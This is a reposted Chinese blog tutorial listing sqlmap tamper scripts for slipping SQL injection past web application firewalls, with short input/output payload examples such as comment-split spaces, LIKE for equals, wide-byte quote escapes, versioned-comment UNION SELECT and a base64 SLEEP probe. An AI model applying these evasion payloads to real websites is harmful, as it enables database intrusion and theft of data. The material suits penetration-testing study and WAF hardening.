sql注入之tamper绕过WAF防火墙

最新推荐文章于 2024-05-14 20:30:42 发布
最新推荐文章于 2024-05-14 20:30:42 发布
阅读量401 收藏
点赞数
文章标签: python 数据库
原文链接:http://www.cnblogs.com/lazy0/p/5723961.html
版权


### 现象:


当我们注入的时候,发现有狗,有waf,真的是我的小心脏都碎掉了!!但是呢,很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。利用sqlmap中的tamper给我们带来了很多防过滤的脚本绕过。


提示“输入内容存在危险字符,已经被拦截”

提示“请不要尝试在参数中包含非法字符尝试注入”


### 判断我们使用那种脚本


    1,id=1空格      测试空格
    2,id=1%201=1     测试等号
    3,id=1%201=1 select 测试select
    ......

### 字符被过滤了,使用的py

1,空格被过滤了---->[space2commnet.py]()

    * Input: SELECT id FROM users
    * Output: SELECT//id//FROM/**/users


   空格被过滤了----->[space2bash.py]()
 
   空格被过滤了----->[space2morebash.py]()---->#代替
    
   空格被过滤了----->[space2plus.py]()------+代替

2, 单引号被过滤了--->[apostrophemask.py]()---->utf_8代替引号

双引号绕过---->[apostrophenullencode.py]()

    Example:
    tamper("1 AND '1'='1")
    '1 AND %00%271%00%27=%00%271'

3,等号被过滤了----->[equaltolike.py]()------>like代替等号

    Example:
    * Input: SELECT * FROM users WHERE id=1
    * Output: SELECT * FROM users WHERE id LIKE 1

4,>被过滤了------>[greatest.py]()-------->用GREATEST代替

    Example:
    ('1 AND A > B')
    '1 AND GREATEST(A,B+1)=A'

   ------->[between.py]()

    Example: 
    ('1 AND A > B--') 
    '1 AND A NOT BETWEEN 0 AND B--'

5,双引号,替换字符和双引号被过滤--->[apostrophenullencode.py]()

    Example:
    ("1 AND '1'='1")
    '1 AND %00%271%00%27=%00%271'

6,数据库是mysql时--->[halfversionedmorekeywords.py]()

    

6,加载零字节字符----->[appendnullbyte.py]()

    Example: ('1 AND 1=1') '1 AND 1=1%00'

url编码转换------>[charencode.py]()

    Example:
    * Input: SELECT FIELD FROM%20TABLE
    * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

字符串 unicode 编码绕过--->[charunicodeencode.py]()

    Example:
    * Input: SELECT FIELD%20FROM TABLE
    * Output:%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046

大小写的转换----->[randomcase.py]()

    Input: INSERT
    Output: InsERt

宽字符绕过---->[unmagicquotes.py]()

    Example:
    * Input: 1′ AND 1=1
    * Output: 1%bf%27 AND 1=1–%20

用/**/分割sql关键字--->[randomcomments.py]()

    Example:
    ‘INSERT’ becomes ‘IN//S//ERT’

关键字前加注释绕过---->[versionedmorekeywords.py]()

    Example:
    * Input: 1 UNION ALL SELECT NULL, NULL,
    CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS
    CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
    * Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*
    /(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

用base64绕过

    Example:
    ("1' AND SLEEP(5)#")
    'MScgQU5EIFNMRUVQKDUpIw=='

这里有两份汇总的文件,大家需要的可以下载一下。





后期会继续添加的,有错误或者更好的,可以留言,大家相互学习!!

转载于:https://www.cnblogs.com/lazy0/p/5723961.html

weixin_33974433
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据.pdf
03-24
实战绕过双重waf 玄武盾+程序自身过滤 结合编写sqlmap的tamper获取数据 文档来自互联网仅做学习使用,请勿使用文档相关内容进行违法犯罪活动。
常见 SQL 注入绕过方法
Flag少侠的博客
04-25 1667
Web应用通常会使用输入过滤器,设计这些过滤器的目的是防御包括SOL 注入在内的常见攻击。这些过滤器可能位于应用的代码中(自定义输入验证方式),也可能在应用外部实现,形式为 Web应用防火墙(WAF)或入侵防御系统(IPS)
sql注入-WAF绕过】编写sqlmap的tamper进行sql注入
06-29 6146
【特征】特殊符号+十六进制格式
探秘SQLMap Tamper:强大的SQL注入漏洞测试工具(1)
最新发布
2401_84972966的博客
05-14 554
是一个基于Python编写的插件,它是流行的安全测试工具SQLMap的一个扩展。它的核心功能是帮助安全研究员和渗透测试人员在进行SQL注入测试时,实现对SQL语句的修改和操纵,以发现并利用潜在的数据库漏洞。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
sqlmap --tamper 绕过WAF脚本分类整理
qq_50854662的博客
10-04 914
每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格...
day27WEB攻防-通用漏洞&SQL注入&常见SQL注入类型&Tamper脚本的使用
m0_69583059的博客
01-18 1469
如果在实战中我们遇到了这样的问题应该如何解决,这里我们可以采用宽字节绕过,就是借助一些繁体字符或者乱码字符来占用字节位数,从而尝试绕过,例如,如果对单引号'进行了转义,我们可以通过在单引号前面加上%df来占用转义符号,没有了转义字符传入的数据就是正常的了。开发程序里面,数字不需要单引号,字符需要单引号,双引号去概括的,在注入的时候,需要考虑到符号的闭合,才能正确去执行SQL,完成注入。在注入的过程中,会遇到一些复杂的注入(waf绕过,过滤,编码等),tamper脚本可以尝试绕过
tamperWAF详解
weixin_34112208的博客
06-16 871
0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击。 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我,着能偷偷说一下多做一些收集对吸收知识很快。 0x01 start 脚本名:apostrophem...
SQLMap之Tamper.docx
09-26
SQLMap 是一个功能强大的 SQL 注入攻击工具,它提供了 tamper 脚本来帮助攻击者绕过应用程序的敏感字符过滤和 WAF 规则的阻挡,从而进行渗透攻击。tamper 脚本可以在一定程度上避开应用程序的敏感字符过滤和 WAF ...
长亭waf绕过1.pdf
07-09
长亭waf绕过1
WAF是如何被绕过
06-21
以一些实际的WAF产品为例,了解它们的基本原理,它们存在的缺陷,以及攻击者是如何利用它们的缺陷让它们形同虚设的。我们应当更注重于注重自身系统和应用的安全,不能以为有了WAF就可以高枕无忧。
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
SQLMap的Tamper脚本
m0_62207482的博客
01-31 3127
SQLMap是一款用来检测与利用SQL注入漏洞的免费 开源工具,不仅可以实现SQL注入漏洞的检测与利用的自动化处理,而且其自带 的Tamper脚本可以帮助我们绕过IDS/WAF的检测。虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站 的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个 时候就需要我们针对目标的防护体系手动构建相应的Tamper脚本。Tamper脚本的构建非常简单,其实渗透测试中真正的难点在于如何针对目标 网站的防护找出对应的绕过方法。
第27天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5等
wuqingsix的博客
11-19 522
不同payload类型的注入方式构造:字符型,搜索形 ,加密,编码形。宽字节的构造和绕过, sqlmap的tamper字典使用
day27 SQL注入&Tamper脚本
wanjia01的博客
10-15 903
小迪安全笔记
sqlmap注入之tamper绕过WAF防火墙过滤
热门推荐
ru_li的专栏
05-19 1万+
每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。 所以
记一次sql注入分析与绕过【一】
good good study
07-31 514
sql手工注入实战项目,tamper脚本编写
sql 数据类型注入+tamper
2202_75317918的博客
12-15 521
(开发程序里面,数字不需要单引号,字符需要单引号 双引号去概括的需要考虑到符号的闭合 才能正确去执行SQL 完成SQL注入)我在本地尝试了编码型base64。
(19)网络安全:WAF绕过去了嘛?没有撤退可言。
03-03 4258
手工,工具,就是要和waf杠到底,就算杀敌一千自损八百
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值